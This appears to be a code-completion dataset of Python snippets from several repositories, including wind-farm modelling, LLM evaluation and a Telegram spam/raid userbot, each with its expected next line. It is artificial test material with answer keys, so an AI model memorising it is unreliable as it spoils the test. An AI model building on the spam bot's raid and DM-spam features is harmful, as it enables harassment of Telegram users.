# Path: utils/model_conf.py
def gen_config(dataset_name: str):
with open("./config/config.json", "r") as f:
conf = loads(f.read())
conf["data"]["spk2id"][dataset_name] = 0
with open(f"{dataset_dir}/{dataset_name}/config.json", "w") as f:
f.write(dumps(conf))
# Path: main.py
from utils.create import create
from utils.tag import tag
from utils.resample import resample
from utils.clean import clean
from utils.model_conf import gen_config
if __name__ == "__main__":
pass
dataset_name = input("请为数据集命名:")
create(dataset_name)
resample(dataset_name)
tag(dataset_name)
clean(dataset_name)
| gen_config(dataset_name) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: itzshukla/STRANGER-SPAM
# Path: config.py
SUDO_USERS = list(map(lambda x: int(x), getenv("SUDO_USERS", "6163010926").split(" ")))
# Path: config.py
ALIVE_PIC = getenv("ALIVE_PIC", "https://telegra.ph/file/aa4bf1e57d11fb75b602e.jpg")
# Path: config.py
OWNER_ID = int(getenv("OWNER_ID", "5518687442"))
# Path: config.py
HEROKU_APP_NAME = getenv("HEROKU_APP_NAME")
# Path: config.py
HEROKU_API_KEY = getenv("HEROKU_API_KEY")
# Path: TheXSpam/extra.py
import heroku3
from os import getenv
from config import SUDO_USERS, ALIVE_PIC, OWNER_ID, HEROKU_APP_NAME, HEROKU_API_KEY
from pyrogram import Client, filters
from pyrogram.types import Message
# © @shiva_ansh_op
FIRST_TEXT = f"""★ 𝗦𝘁𝗿𝗮𝗻𝗴𝗲𝗿-𝙎𝙥𝙖𝙢 𝙃𝙚𝙡𝙥 𝙈𝙚𝙣𝙪 ★
**» ʙᴏᴛ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/5)
**» ʀᴀɪᴅ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/6)
**» ꜱᴘᴀᴍ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/7)
**» ᴅᴍ ᴄᴏᴍᴍᴀɴᴅꜱ:** [ᴄʟɪᴄᴋ ʜᴇʀᴇ](https://t.me/mastiwithfriendsx/8)"""
@Client.on_message(filters.user(SUDO_USERS) & filters.command(["help"], [".", "!", "/"]))
async def help(client: Client, message: Message):
await client.send_photo(
chat_id=message.chat.id,
photo=ALIVE_PIC,
caption=FIRST_TEXT
)
@Client.on_message(filters.user(OWNER_ID) & filters.command(["sudo"], ["/", ".", "!"]))
async def add_sudo(_, message: Message):
if not message.reply_to_message:
await message.reply_text("» ʀᴇᴘʟʏ ᴛᴏ ᴀ ᴜꜱᴇʀ !!")
return
| elif HEROKU_APP_NAME is None:
|
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: fg320/DEASC
# Path: deasc/utils_floris.py
def floris_input_handler(input_file, path):
"""Convert input file into a FLORIS interface object."""
# No input file
if input_file == None:
err_msg = "Input file required"
raise Exception(err_msg)
# Multiple input files
elif isinstance(input_file, list) is True:
err_msg = "Required a single input file, multiple are provided"
raise Exception(err_msg)
# Initialize single floris object
else:
fi = FI(path+input_file)
print("Successfull single file import!")
return fi
# Path: deasc/utils_floris.py
def floris_properties(wf_model):
"""Extract wind farm model information from FLORIS object."""
fi = wf_model.interface
D = (fi.floris.farm.rotor_diameters).flatten()[0] # Flatten over wd and ws
H_hub = (fi.floris.farm.hub_heights).flatten()[0] # Flatten over wd and ws
n_turbs = len(wf_model.interface.get_turbine_layout()[0])
return D, H_hub, n_turbs
# Path: deasc/utils_floris.py
def floris_current_yaw(wf_model):
"""Extract and returns the current wind farm yaw angles."""
return wf_model.interface.floris.farm.yaw_angles[0][0]
# Path: deasc/utils_floris.py
def floris_reinitialise_layout(wf_model, layout_x, layout_y):
"""
Modify wind farm layout based on the coordinates provided and also
reinitialises the flow field. If the number of turbines is unchanged,
yaw angles are stored in the farm object. Limited to a FLORIS interface
object.
"""
# Extract FLORIS interface object
fi = wf_model.interface
# As floris reinitializes, it sets all yaw angles to 0 deg.
yaw_temp = fi.floris.farm.yaw_angles[0][0]
fi.reinitialize(layout_x=layout_x, layout_y=layout_y)
# Update number of turbines
wf_model.n_turbs = len(wf_model.interface.get_turbine_layout()[0])
# Keep old yaw angles only if the number of turbines is the same
if len(yaw_temp) == len(layout_x):
fi.calculate_wake(yaw_angles=np.array([[yaw_temp]]))
# Path: deasc/utils_floris.py
def floris_farm_eval(wf_model, yaw, ws, wd, ti, shear):
"""
Calculate wind farm power and wind turbine powers given an
atmopheric and yaw condition. Farm layout is unchanged and information such
as yaw angles preserved even if not explicitly specified.
"""
# Extract FLORIS interface object
fi = wf_model.interface
# Start floris farm computational time
start = time.time()
# Get yaw angles before reinitializing - set to 0 when reinitializing flow
yaw = fi.floris.farm.yaw_angles[0][0] if yaw is None else yaw
# Get wd and ws as None is not an option in reinitialize flow
ws = fi.floris.flow_field.wind_speeds[0] if ws is None else ws
wd = fi.floris.flow_field.wind_directions[0] if wd is None else wd
# Error if yaw angles don't match turbine number
if len(yaw) != len(fi.floris.farm.yaw_angles[0][0]):
err_msg = "Yaw prescribed not matching turbine number"
raise Exception(err_msg)
# Reinitialize flow field and set previous yaw angles
fi.reinitialize(wind_speeds=[ws],
wind_directions=[wd],
turbulence_intensity=ti,
wind_shear=shear)
yaw = np.array([float(item) for item in yaw])
fi.calculate_wake(yaw_angles=np.array([[yaw]]))
# Calculate wf power, wt powers, wt turbulence intensities, wt yaw angles
wf_pow = (fi.get_farm_power()*10**(-6))[0][0]
wt_pow = (np.array(fi.get_turbine_powers())*10**(-6))[0][0]
wt_ti = (fi.get_turbine_TIs())[0][0]
wt_yaw = np.array(fi.floris.farm.yaw_angles[0][0])
# Report CPU time
cpu_time = time.time()-start
return (wf_pow, wt_pow, wt_ti, wt_yaw, cpu_time)
# Path: deasc/wf_model.py
import warnings
import numpy as np
from .utils_floris import (
floris_input_handler,
floris_properties,
floris_current_yaw,
floris_reinitialise_layout,
floris_farm_eval
)
# Copyright 2023 Filippo Gori
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
class WfModel:
"""
Class for wind farm modelling (Interface setup but not limited to FLORIS
framework).
"""
def __init__(self, input_file, path):
"""
Initialise wind farm object by pointing towards an input file.
(FLORIS interface object).
Args
----
input file:(FLORIS .json input file).
"""
# Read and initialize input file
self.input_file = input_file
self.interface = floris_input_handler(self.input_file, path)
# Assign wind farm model proporties
| self.D, self.H_hub, self.n_turbs = floris_properties(self) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: CPES-Power-and-Energy-Systems/interoperable-recommender-tso
# Path: energy_app/src/energy_app_client/Endpoint.py
class Endpoint:
# Path: energy_app/src/energy_app_client/RequestController.py
class RequestController:
"""
Manages api calls to remote endpoint using Python *requests* package
"""
def __init__(self):
self.retries = settings.ENERGYAPP["n_retries"]
self.remote_host = settings.ENERGYAPP["host"]
self.remote_port = settings.ENERGYAPP["port"]
self.remote_uri = f"http://{self.remote_host}:{self.remote_port}"
self.headers = {
'content-type': 'application/json'
}
# note the endpoint is forced to follow the standard Endpoint class
def request(self,
endpoint: Endpoint,
data=None,
params=None,
url_params=None,
auth_token=None) -> Response:
"""
:param endpoint:
:param data:
:param params:
:param url_params:
:param auth_token:
:return:
"""
url = self.remote_uri + endpoint.uri
if url_params is not None:
if url[-1] != "/":
url += "/"
for p in url_params:
url += f"{p}"
logger.debug(f"[{endpoint.http_method}]Request to: {url}")
data = None if data is None else json.dumps(data)
headers_ = self.headers
if auth_token:
headers_['Authorization'] = f'Bearer {auth_token}'
try:
response = self.__requests_retry_session().request(
method=endpoint.http_method,
url=url,
data=data,
params=params,
headers=headers_
)
except (requests.HTTPError, requests.exceptions.ConnectionError,
requests.exceptions.InvalidURL) as e:
raise e
return response
def __requests_retry_session(self,
back_off_factor=0.3,
status_force_list=(500, 502, 504),
session=None
):
"""
https://www.peterbe.com/plog/best-practice-with-retries-with-requests
:param back_off_factor:
:param status_force_list:
:param session:
:return:
"""
session = session or requests.Session()
retry = Retry(
total=self.retries,
read=self.retries,
connect=self.retries,
backoff_factor=back_off_factor,
status_forcelist=status_force_list,
)
adapter = HTTPAdapter(max_retries=retry)
session.mount('http://', adapter)
session.mount('https://', adapter)
return session
# Path: energy_app/src/energy_app_client/exception/APIException.py
class LoginException(Exception):
def __init__(self, message, errors):
# Call the base class constructor with the parameters it needs
super().__init__(message)
# Now for your custom code...
self.errors = errors
# Path: energy_app/src/energy_app_client/exception/APIException.py
class PostActionsException(Exception):
def __init__(self, message, errors):
# Call the base class constructor with the parameters it needs
super().__init__(message)
# Now for your custom code...
self.errors = errors
# Path: energy_app/src/energy_app_client/Controller.py
from time import time
from loguru import logger
from http import HTTPStatus
from .Endpoint import Endpoint, post_actions
from .RequestController import RequestController
from .exception import LoginException, PostActionsException
class Controller(RequestController):
def __init__(self):
RequestController.__init__(self)
self.access_token = ""
def __check_if_token_exists(self):
if self.access_token is None:
e_msg = "Access token is not yet available. Login first."
logger.error(e_msg)
raise ValueError(e_msg)
def set_access_token(self, token):
self.access_token = token
def login(self, email: str, password: str):
raise NotImplementedError("Method not implemented.")
def __request_template(self,
| endpoint_cls: Endpoint, |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: PlaxtonFlarion/NexaFlow
# Path: nexaflow/toolbox.py
def video_capture(video_path: str):
def video_jump(video_cap: cv2.VideoCapture, frame_id: int):
def compare_ssim(pic1: np.ndarray, pic2: np.ndarray) -> float:
def multi_compare_ssim(
pic1_list: typing.List, pic2_list: typing.List, hooks: typing.List = None
) -> typing.List[float]:
def get_current_frame_id(video_cap: cv2.VideoCapture) -> int:
def get_current_frame_time(video_cap: cv2.VideoCapture) -> float:
def imread(img_path: str, *_, **__) -> np.ndarray:
def get_frame_time(
video_cap: cv2.VideoCapture, frame_id: int, recover: bool = None
) -> float:
def get_frame_count(video_cap: cv2.VideoCapture) -> int:
def get_frame_size(video_cap: cv2.VideoCapture) -> typing.Tuple[int, int]:
def get_frame(
video_cap: cv2.VideoCapture, frame_id: int, recover: bool = None
) -> np.ndarray:
def turn_grey(old: np.ndarray) -> np.ndarray:
def turn_binary(old: np.ndarray) -> np.ndarray:
def turn_hog_desc(old: np.ndarray) -> np.ndarray:
def turn_lbp_desc(old: np.ndarray, radius: int = None) -> np.ndarray:
def turn_blur(old: np.ndarray) -> np.ndarray:
def sharpen_frame(old: np.ndarray) -> np.ndarray:
def calc_mse(pic1: np.ndarray, pic2: np.ndarray) -> float:
def calc_psnr(pic1: np.ndarray, pic2: np.ndarray) -> float:
def compress_frame(
old: np.ndarray,
compress_rate: float = None,
target_size: typing.Tuple[int, int] = None,
not_grey: bool = None,
interpolation: int = None,
*_,
**__,
) -> np.ndarray:
def get_timestamp_str() -> str:
def np2b64str(frame: np.ndarray) -> str:
def fps_convert(
target_fps: int, source_path: str, target_path: str, ffmpeg_exe: str = None
) -> int:
def match_template_with_object(
template: np.ndarray,
target: np.ndarray,
engine_template_cv_method_name: str = None,
**kwargs,
) -> typing.Dict[str, typing.Any]:
def match_template_with_path(
template: str, target: np.ndarray, **kwargs
) -> typing.Dict[str, typing.Any]:
def show_progress(total: int, color: int, title: str) -> tqdm:
def draw_line(image_path: str, save_path: str = None):
# Path: nexaflow/video.py
class VideoFrame(Frame):
def __init__(self, frame_id: int, timestamp: float, data: np.ndarray):
super().__init__(frame_id, timestamp, data)
def __str__(self):
return f"<VideoFrame id={self.frame_id} timestamp={self.timestamp}>"
@staticmethod
def initial(cap: cv2.VideoCapture, frame: np.ndarray) -> "VideoFrame":
frame_id = toolbox.get_current_frame_id(cap)
timestamp = toolbox.get_current_frame_time(cap)
new_frame = toolbox.compress_frame(frame, 0.5, (350, 700), False)
return VideoFrame(frame_id, timestamp, new_frame)
def copy(self) -> "VideoFrame":
return VideoFrame(self.frame_id, self.timestamp, self.data[:])
def contain_image(
self, *, image_path: str = None, image_object: np.ndarray = None, **kwargs
) -> typing.Dict[str, typing.Any]:
"""
检查给定图像(通过路径或numpy对象)是否存在于当前帧中,并返回匹配的字典
"""
assert image_path or (
image_object is not None
), "should fill image_path or image_object"
if image_path:
logger.debug(f"found image path, use it first: {image_path}")
return toolbox.match_template_with_path(image_path, self.data, **kwargs)
image_object = toolbox.turn_grey(image_object)
return toolbox.match_template_with_object(image_object, self.data, **kwargs)
# Path: nexaflow/hook.py
import os
import cv2
import typing
from loguru import logger
from nexaflow import toolbox
from nexaflow.video import VideoFrame
class BaseHook(object):
def __init__(self, *_, **__):
# logger.debug(f"start initialing: {self.__class__.__name__} ...")
logger.info(f"加载视频帧处理单元: Frame Processor {self.__class__.__name__} ...")
self.result = dict()
def do(self, frame: VideoFrame, *_, **__) -> typing.Optional[VideoFrame]:
# info = f"execute hook: {self.__class__.__name__}"
frame_id = frame.frame_id
if frame_id != -1:
# logger.debug(f"{info}, frame id: {frame_id}")
pass
return frame
class ExampleHook(BaseHook):
def __init__(self, *_, **__):
super().__init__(*_, **__)
def do(self, frame: VideoFrame, *_, **__) -> typing.Optional[VideoFrame]:
super().do(frame, *_, **__)
| frame.data = toolbox.turn_grey(frame.data) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: OpenBMB/XAgent
# Path: run.py
def parse_args() -> argparse.Namespace:
"""
Parse the command line arguments and return them as an argparse.Namespace object.
Returns:
argparse.Namespace: An object containing command line arguments and their values.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--task", type=str, required=True, help="The task description.")
parser.add_argument("--upload-files", nargs='+', dest="upload_files", help="List of files to upload.")
parser.add_argument("--model", type=str, help="Model identifier for the task.")
parser.add_argument("--record-dir", type=str, dest="record_dir", help="Directory to record task execution logs.")
parser.add_argument("--mode", type=str, default="auto", help="Operational mode: 'auto' or 'manual'.")
parser.add_argument("--quiet", action="store_true", default=False, help="Run in quiet mode; minimal output.")
parser.add_argument("--max-subtask-chain-length", type=int, dest="max_subtask_chain_length",
help="Maximum length of subtask chain.")
parser.add_argument("--enable-ask-human-for-help", action="store_true", dest="enable_ask_human_for_help",
help="Flag to enable asking for human assistance.")
parser.add_argument("--max-plan-refine-chain-length", type=int, dest="max_plan_refine_chain_length",
help="Maximum length of plan refinement chain.")
parser.add_argument("--max-plan-tree-depth", type=int, dest="max_plan_tree_depth",
help="Maximum depth of the plan tree.")
parser.add_argument("--max-plan-tree-width", type=int, dest="max_plan_tree_width",
help="Maximum width of the plan tree.")
parser.add_argument("--max-retry-times", type=int, dest="max_retry_times", help="Maximum number of retry attempts.")
parser.add_argument("--config-file", type=str, default=os.getenv('CONFIG_FILE', 'assets/config.yml'),
dest="config_file", help="Path to the configuration file.")
return parser.parse_args()
# Path: run.py
def execute_command_line_process(args: argparse.Namespace, quiet_mode: bool = False) -> None:
"""
Execute the command line process based on the parsed arguments. If quiet mode is enabled,
redirect stdout to a file specified by the recorder's record_root_dir.
Args:
args (argparse.Namespace): Parsed command line arguments.
quiet_mode (bool): Whether to run in quiet mode, outputting to a file instead of the terminal.
"""
args_dict = vars(args)
for key, value in args_dict.items():
if value is not None:
if key == 'model':
ARGS['default_completion_kwargs'] = deepcopy(CONFIG['default_completion_kwargs'])
ARGS['default_completion_kwargs']['model'] = value
else:
ARGS[key] = value
# Redirect stdout to a file if quiet mode is true
if quiet_mode:
from XAgent.running_recorder import recorder
record_file_path = os.path.join(recorder.record_root_dir, "command_line.ansi")
with open(record_file_path, "w", encoding="utf-8") as file, redirect_stdout(file):
start_command_line(args_dict)
else:
start_command_line(args_dict)
# Path: run.py
def start_command_line(args_dict: dict) -> None:
"""
Start the command line interface with the provided arguments.
Args:
args_dict (dict): A dictionary of command line arguments.
"""
param = CommandLineParam(
task=args_dict['task'],
upload_files=args_dict.get('upload_files'),
role="Assistant",
mode=args_dict["mode"],
)
cmd = CommandLine(param)
cmd.start()
# Path: tests/test_run.py
import pytest
import sys
from run import parse_args, execute_command_line_process, start_command_line
from unittest.mock import patch
@pytest.fixture
def mock_argv(monkeypatch):
"""
A pytest fixture to mock the command line arguments.
It sets the sys.argv to mimic command line input for testing.
"""
test_args = ["--task", "example_task", "--upload-files", "file1", "file2", "--model", "model1"]
monkeypatch.setattr(sys, 'argv', ['test_script.py'] + test_args)
def test_parse_args(mock_argv):
"""
Test to ensure that the parse_args function correctly parses command line arguments.
"""
| args = parse_args() |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: pytorch-labs/gpt-fast
# Path: eval.py
def setup_cache_padded_seq_input_pos_max_seq_length_for_prefill(
model: LLaMA,
prompt: torch.Tensor,
max_new_tokens: int,
max_seq_length: Optional[int] = None,
):
"""
Sets up model cache and does some bookkeeping calculations for prompt, input_pos and max_seq_length
that are needed for prefill or model_forward
Args:
model (LLaMA): The model whose cache gets set up
prompt (torch.Tensor): Tensor of shape (T) with indices of the prompt sequence.
max_new_tokens (int): The desired maximum number of new tokens that can be generated.
max_seq_length (Optional[int], optional): The maximum sequence length allowed.
Returns:
seq (torch.Tensor): prompt but padded with zeros to size max_seq_length
input_pos (torch.Tensor): tensor of integers in increasing order
max_seq_length (int): The maximum sequence length allowed, updated based on other numbers
"""
T = prompt.size(0)
T_new = T + max_new_tokens
if max_seq_length is None:
max_seq_length = min(T_new, model.config.block_size)
device, dtype = prompt.device, prompt.dtype
# create an empty tensor of the expected final shape and fill in the current tokens
empty = torch.empty(T_new, dtype=dtype, device=device)
empty[:T] = prompt
seq = empty
input_pos = torch.arange(0, T, device=device)
with torch.device(device):
model.setup_caches(max_batch_size=1, max_seq_length=max_seq_length)
return seq, input_pos, max_seq_length
# Path: generate.py
def encode_tokens(tokenizer, string, bos=True, device='cuda'):
tokens = tokenizer.encode(string)
if bos:
tokens = [tokenizer.bos_id()] + tokens
return torch.tensor(tokens, dtype=torch.int, device=device)
# Path: GPTQ.py
import os
import sys
import torch
import main as lm_evaluation_harness_main
import torch.fx as fx
import torch.nn as nn
import torch.nn.functional as F
import lm_eval
from torch.utils._pytree import tree_flatten, tree_unflatten
from eval import setup_cache_padded_seq_input_pos_max_seq_length_for_prefill
from generate import encode_tokens
aten = torch.ops.aten
try:
class InputRecorder(lm_eval.base.BaseLM):
"""
This is a fake evaluation wrapper that just records the inputs
so that they can be used in calibration.
If pad_calibration_inputs is enabled, the input recorder will take
each input and pad/truncate it down to the calibration_seq_length.
It will also edit the model embeddings to be zero for the 0 token used
in padding and avoid any inputs with the 0 token.
If not, it will only truncate inputs to the desired length.
"""
def __init__(
self,
model,
tokenizer,
calibration_seq_length,
pad_calibration_inputs=False,
):
super().__init__()
self._model = model
self._tokenizer = tokenizer
self._device = torch.device("cpu")
self.vocab_size = model.config.vocab_size
self.calibration_seq_length = calibration_seq_length
self.pad_calibration_inputs = pad_calibration_inputs
self.inputs = None
if self.pad_calibration_inputs:
# This is needed for the pad_calibration_inputs option
# to work properly, the 0 token's embeddings are set to 0 so that
# the padded inputs will not affect the model numerics. This token isn't used
# commonly in the eval tasks for the meta-llama tokenizer and we skip any inputs
# where it appears
try:
if isinstance(self._model.transformer.wte, nn.Embedding):
self.mod.transformer.wte.weight.data[0, :] *= 0
except:
print(
"Did not find embeddings in model.transformer.wte, disabling padding"
)
self.pad_calibration_inputs = False
@property
def eot_token_id(self):
return self._tokenizer.eos_id()
@property
def max_length(self):
return self.calibration_seq_length
@property
def max_gen_toks(self):
return 50
@property
def batch_size(self):
return 1
@property
def device(self):
return self._device
def tok_encode(self, string: str):
encoded = encode_tokens(
self._tokenizer, string, bos=True, eos=False, device=self._device
)
# encoded is a pytorch tensor, but some internal logic in the
# eval harness expects it to be a list instead
# TODO: verify this for multi-batch as well
encoded = encoded.tolist()
return encoded
def tok_decode(self, tokens):
decoded = self._tokenizer.decode(tokens)
return decoded
def add_input(self, args):
if self.inputs is None:
self.inputs = [MultiInput([arg]) for arg in args]
else:
self.inputs = [
multi.add_input(arg) for (multi, arg) in zip(self.inputs, args)
]
def get_recorded_inputs(self):
return self.inputs
def _model_call(self, inps):
inps = inps.squeeze(0)
T = len(inps)
if (
# can't use inputs that are too short when padding disabled
(T < self.calibration_seq_length and not self.pad_calibration_inputs)
or
# can't use inputs that actually use token we use for padding
(self.pad_calibration_inputs and 0 in inps)
):
# give random output
return torch.randn(
(1, T, self.vocab_size), dtype=torch.bfloat16, device=self._device
)
# pad or truncate to the right size
if T >= self.calibration_seq_length:
inps = inps[: self.calibration_seq_length]
else:
inps = F.pad(inps, (0, self.calibration_seq_length - T))
max_new_tokens = 1
(
seq,
input_pos,
max_seq_length,
| ) = setup_cache_padded_seq_input_pos_max_seq_length_for_prefill( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: deepseek-ai/DeepSeek-Coder
# Path: Evaluation/MBPP/human_eval/data.py
HUMAN_EVAL = os.path.join(ROOT, "..", "data", "HumanEval.jsonl.gz")
# Path: Evaluation/MBPP/human_eval/evaluation.py
def evaluate_functional_correctness(
input_file: str = None,
tmp_dir: str = "./",
n_workers: int = 32,
timeout: float = 10.0,
problem_file: str = "../data/humaneval_python.jsonl.gz",
out_dir: str = None,
k: List[int] = [1, 10, 100],
test_groundtruth: bool = False,
example_test: bool = False,
is_mbpp: bool = False,
language: str = "python",
):
"""
Evaluates the functional correctness of a model.
"""
if example_test:
print("Example test...")
problems = read_dataset(problem_file,
dataset_type="humaneval")
sample_jsonl = stream_jsonl_all(input_file)
with ThreadPoolExecutor(max_workers=n_workers) as executor:
futures = []
completion_id = Counter()
n_samples = 0
results = defaultdict(list)
if test_groundtruth:
print("Testing ground truth...")
for sample in tqdm(problems.values()):
task_id = sample["task_id"]
lang = task_id.split("/")[0].lower()
if lang == "javascript":
lang = "js"
tmp_dir_ = os.path.join(tmp_dir, lang, "evaluation")
sample["generation"] = sample["canonical_solution"]
sample["test_code"] = process_humaneval_test(sample, problems, example_test, language)
if sample["test_code"] is None:
continue
args = (task_id, sample, lang, timeout, tmp_dir_, completion_id[task_id])
future = executor.submit(check_correctness, *args)
futures.append(future)
completion_id[task_id] += 1
n_samples += 1
else:
print("Reading samples...")
for sample in tqdm(sample_jsonl):
task_id = sample["task_id"]
if not is_mbpp:
lang = language
if not is_mbpp and lang == "javascript":
lang = "js"
if is_mbpp:
lang = "python"
tmp_dir_ = os.path.join(tmp_dir, lang, "evaluation")
sample["task_id"] = task_id
sample["test_code"] = process_humaneval_test(sample, problems, example_test, is_mbpp, language)
if sample["test_code"] is None:
continue
if "completion_id" in sample:
completion_id_ = sample["completion_id"]
else:
completion_id_ = completion_id[task_id]
args = (task_id, sample, lang, timeout, tmp_dir_, completion_id_)
future = executor.submit(check_correctness, *args)
futures.append(future)
completion_id[task_id] += 1
n_samples += 1
if len(completion_id) == len(problems):
evaluate_pass_at_k = True
else:
evaluate_pass_at_k = False
print("Running test suites...")
for future in tqdm(as_completed(futures), total=len(futures)):
result = future.result()
results[result["task_id"]].append((result["completion_id"], result))
# Calculate pass@k.
total, correct = [], []
for result in results.values():
passed = [r[1]["passed"] for r in result]
total.append(len(passed))
correct.append(sum(passed))
total = np.array(total)
correct = np.array(correct)
if evaluate_pass_at_k:
ks = k
pass_at_k = {f"pass@{k}": estimate_pass_at_k(total, correct, k).mean()
for k in ks if (total >= k).all()}
print(pass_at_k)
else:
print("Total:", np.sum(total))
print("Correct:", np.sum(correct))
return pass_at_k
# Path: Evaluation/MBPP/human_eval/evaluate_functional_correctness.py
import fire
import sys
from .data import HUMAN_EVAL
from .evaluation import evaluate_functional_correctness
def entry_point(
sample_file: str,
k: str = "1,10,100",
n_workers: int = 4,
timeout: float = 3.0,
problem_file: str = "",
is_mbpp: bool = False,
):
"""
Evaluates the functional correctness of generated samples, and writes
results to f"{sample_file}_results.jsonl.gz"
"""
k = list(map(int, k.split(",")))
| results = evaluate_functional_correctness(sample_file, k, n_workers, timeout, problem_file, is_mbpp) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: PKU-YuanGroup/Video-LLaVA
# Path: llava/model/multimodal_encoder/builder.py
def build_image_tower(image_tower_cfg, **kwargs):
image_tower = getattr(image_tower_cfg, 'mm_image_tower', getattr(image_tower_cfg, 'image_tower', None))
is_absolute_path_exists = os.path.exists(image_tower)
if is_absolute_path_exists or image_tower.startswith("openai") or image_tower.startswith("laion"):
return CLIPVisionTower(image_tower, args=image_tower_cfg, **kwargs)
if image_tower.endswith('LanguageBind_Image'):
return LanguageBindImageTower(image_tower, args=image_tower_cfg, cache_dir='./cache_dir', **kwargs)
if 'mae' in image_tower:
print('maemaemaemaemaemaemaemae')
print('maemaemaemaemaemaemaemae')
print('maemaemaemaemaemaemaemae')
print('maemaemaemaemaemaemaemae')
print('maemaemaemaemaemaemaemae')
return MAEVisionTower(image_tower, args=image_tower_cfg, cache_dir='./cache_dir', **kwargs)
raise ValueError(f'Unknown image tower: {image_tower}')
# Path: llava/model/multimodal_encoder/builder.py
def build_video_tower(video_tower_cfg, **kwargs):
video_tower = getattr(video_tower_cfg, 'mm_video_tower', getattr(video_tower_cfg, 'video_tower', None))
if video_tower.endswith('LanguageBind_Video_merge'):
return LanguageBindVideoTower(video_tower, args=video_tower_cfg, cache_dir='./cache_dir', **kwargs)
raise ValueError(f'Unknown video tower: {video_tower}')
# Path: llava/model/multimodal_projector/builder.py
def build_vision_projector(config, delay_load=False, **kwargs):
projector_type = getattr(config, 'mm_projector_type', 'linear')
if projector_type == 'linear':
return nn.Linear(config.mm_hidden_size, config.hidden_size)
elif projector_type == 'identity':
return IdentityMap()
elif projector_type.startswith('qformer'): # qformer2_64
qformer_config = qformer_config_template(config, projector_type)
return Blip2Model(qformer_config)
else:
mlp_gelu_match = re.match(r'^mlp(\d+)x_gelu$', projector_type)
if mlp_gelu_match:
mlp_depth = int(mlp_gelu_match.group(1))
modules = [nn.Linear(config.mm_hidden_size, config.hidden_size)]
for _ in range(1, mlp_depth):
modules.append(nn.GELU())
modules.append(nn.Linear(config.hidden_size, config.hidden_size))
return nn.Sequential(*modules)
raise ValueError(f'Unknown projector type: {projector_type}')
# Path: llava/constants.py
IGNORE_INDEX = -100
# Path: llava/constants.py
X_TOKEN_INDEX = {'IMAGE': -200, 'VIDEO': -201, 'AUDIO': -202, 'THERMAL': -203, 'DEPTH': -204}
# Path: llava/constants.py
DEFAULT_X_PATCH_TOKEN = {'IMAGE': "<im_patch>", 'VIDEO': "<vi_patch>", 'AUDIO': "<au_patch>", 'THERMAL': "<th_patch>", 'DEPTH': "<de_patch>"}
# Path: llava/constants.py
DEFAULT_X_START_TOKEN = {'IMAGE': "<im_start>", 'VIDEO': "<vi_start>", 'AUDIO': "<au_start>", 'THERMAL': "<th_start>", 'DEPTH': "<de_start>"}
# Path: llava/constants.py
DEFAULT_X_END_TOKEN = {'IMAGE': "<im_end>", 'VIDEO': "<vi_end>", 'AUDIO': "<au_end>", 'THERMAL': "<th_end>", 'DEPTH': "<de_end>"}
# Path: llava/model/llava_arch.py
from abc import ABC, abstractmethod
from .multimodal_encoder.builder import build_image_tower, build_video_tower
from .multimodal_projector.builder import build_vision_projector
from llava.constants import IGNORE_INDEX, X_TOKEN_INDEX, DEFAULT_X_PATCH_TOKEN, DEFAULT_X_START_TOKEN, DEFAULT_X_END_TOKEN
import torch
import torch.nn as nn
# Copyright 2023 Haotian Liu
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class LlavaMetaModel:
def __init__(self, config):
super(LlavaMetaModel, self).__init__(config)
if hasattr(config, "mm_image_tower"):
self.image_tower = build_image_tower(config, delay_load=True)
| self.mm_projector = build_vision_projector(config) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: deepseek-ai/DreamCraft3D
# Path: extern/ldm_zero123/models/diffusion/sampling_util.py
def norm_thresholding(x0, value):
s = append_dims(x0.pow(2).flatten(1).mean(1).sqrt().clamp(min=value), x0.ndim)
return x0 * (value / s)
# Path: extern/ldm_zero123/models/diffusion/sampling_util.py
